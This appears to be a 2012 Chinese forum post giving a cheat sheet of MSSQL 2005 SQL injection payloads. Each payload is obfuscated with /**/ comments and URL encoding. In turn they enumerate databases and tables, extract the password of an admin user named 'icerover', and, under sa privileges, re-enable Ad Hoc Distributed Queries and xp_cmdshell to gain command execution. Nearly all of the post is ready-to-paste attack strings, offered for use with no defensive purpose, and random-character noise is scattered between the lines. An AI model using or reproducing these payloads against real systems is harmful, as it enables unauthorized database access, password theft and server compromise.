4 U2 M+ u: o0 y8 W, f0 ?& R
5 F3 \. |: R: c( J$ Z
" Y) Q- c* p0 K' l6 Y, q[Copy to clipboard]CODE:
$ h- l @: E; |5 P/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--3 _; |; `# z# \( a: O' z
1 p6 c! B& H8 x/ }5 }# N
爆表语句,somedb部份是所要列的数据库,红色数字1累加# n6 B* x. `8 `) x2 `" K, L
1 d3 `$ G# T" \( P0 i$ `, Q1 n, P7 E$ }; O; i( n& m/ D
[Copy to clipboard]CODE:
: R3 r! o3 ]$ O) ^# z/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
1 s- R5 {- q+ c" R, p* q4 j7 n4 k( C
爆字段语句,爆表admin里user='icerover'的密码段
3 [; k8 y4 _# Y0 o2 Z$ k [3 M! Y& W. B" Y. K# c
4 B9 @; [, L6 q8 ^6 u[Copy to clipboard]CODE:" ^$ m& p" r; {! z& ~3 C5 F
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
1 B8 {( _! _( _6 `* u- A' _( @ Z! o4 ~9 s
mssql2005默认没有开xp_cmdshell的,openrowset也不能用$ z d- K; G+ U5 r
如果是sa权限,可以这样来开启
8 L1 z* \& c0 \# S开启openrowset
7 X5 Q% t, [! a1 x
! i9 }- }3 _) @- } |- m% s
$ H3 i$ a$ F8 V) O& ]) W9 y[Copy to clipboard]CODE:
$ O1 U. m) @2 d# H$ e/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
8 p. ` m: H' O0 D7 |/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
6 C5 i! \; n! K. }9 O7 P' X1 q0 |: d; a4 S: q( A/ ^
开启xp_cmdshell
1 G8 t4 @. a/ [5 W2 v9 D5 ~8 m7 m' [5 ^7 @6 q8 q5 Q
* x& ~7 X, \( l6 @/ \8 @, P7 ~[Copy to clipboard]CODE:
: z' `* [" U& y6 j! m' LEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
" \6 F7 E) T# r& KEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
$ f5 I& R, I! \# N+ r' W- w4 L( U* X% R a3 A: y
ok,over~~晚安& q: M4 Z1 L5 }3 j9 b* v
|
发表于 2012-9-13 17:19:47
收藏
支持
反对